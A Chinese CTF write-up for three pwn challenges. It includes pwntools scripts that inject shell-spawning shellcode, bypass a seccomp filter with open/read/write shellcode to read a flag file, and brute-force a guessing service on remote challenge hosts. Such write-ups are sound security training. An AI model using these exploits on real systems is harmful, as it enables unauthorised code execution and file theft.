3/4,有一道运气好暴力脚本出来的,最后一题rust逆向...
myexec
mmap开辟了一块可写区间,read函数写入该区间
直接shellcode发送shellcraft.sh()就行了
exp:
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
# io=process("./service")
io=remote("43.143.7.127",28003)
shellcode=asm(shellcraft.sh())
io.recvuntil(b"\n")
io.sendline(shellcode)
io.interactive()
mymem
函数主体和上一题一样,不过此题seccomp-tools dump出来发现限制了sys_number
不过可以构造open("")+read("")+write()的函数调用来绕过
exp:
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
# io=process("./mymem")
io=remote("43.143.7.127",28391)
tp_addr=0x50000
shellcode=asm(shellcraft.open("/home/ctf/flag.txt"))+asm(shellcraft.read(3,tp_addr,50))+asm(shellcraft.write(1,tp_addr,50))
io.recvuntil(b"\n")
io.sendline(shellcode)
io.interactive()
oldfashion
非预期了
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
# io=process("./zzzzz")
io=remote("43.142.108.3",28524)
while 1:
io.sendline(b"2")
if io.recv()==(b"Congratulations! You guessed the number correctly.\n"):
break
io.interactive()